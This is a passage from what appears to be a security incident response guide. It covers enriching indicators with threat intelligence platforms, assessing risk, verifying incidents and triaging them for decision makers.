Query CTI platforms (such as VirusTotal, AlienVault OTX, Shodan, or commercial threat intelligence feeds) using technical indicators such as IP addresses, domain names, URLs, or file hashes observed in the environment.
-
Cross-reference multiple CTI sources to increase confidence in the assessment.
-
Check indicators against the organization’s local knowledge base of known false positive sources.
-
Pivot to related indicators revealed by CTI platforms, and search for those additional IOCs across the environment to determine whether the finding is isolated or part of a broader compromise.
-
-
Perform an initial risk assessment, classifying the incident as low, medium, high, or critical (or using another classification system that more closely matches the needs of the organization):
-
Consider attribution confidence, relevance to the organization, attacker capability, and typical impact from CTI sources when calibrating the risk classification.
-
Remember that the absence of threat intelligence does not indicate the absence of a threat.
-
-
Verify the incident using the information collected during the detect activity and CTI enrichment. Choose to continue, stop, or defer the investigation.
-
Triage: Present the verified incident to decision makers:
-
Use plain language to explain the incident and the potential impact on the organization.
-
Provide context by connecting the incident to the organization’s policies, procedures, and operations.
-
Offer recommendations for response actions based on the risk classification and available incident information.
-
Be prepared to answer questions about the incident, its potential impact, and recommended response actions.
-
-
Work with decision makers to determine the appropriate response actions and resource allocation:
-
Decision makers should consider the organization’s overall needs, other demands on the incident response team, team well-being, and the potential impact of the incident.
-
Response actions may include assigning resources to investigate, engaging legal counsel, or notifying law enforcement.
-
Recognize that the analyst’s role may shift from technical investigation to coordination support, particularly when regulatory requirements or legal considerations drive the response effort.
-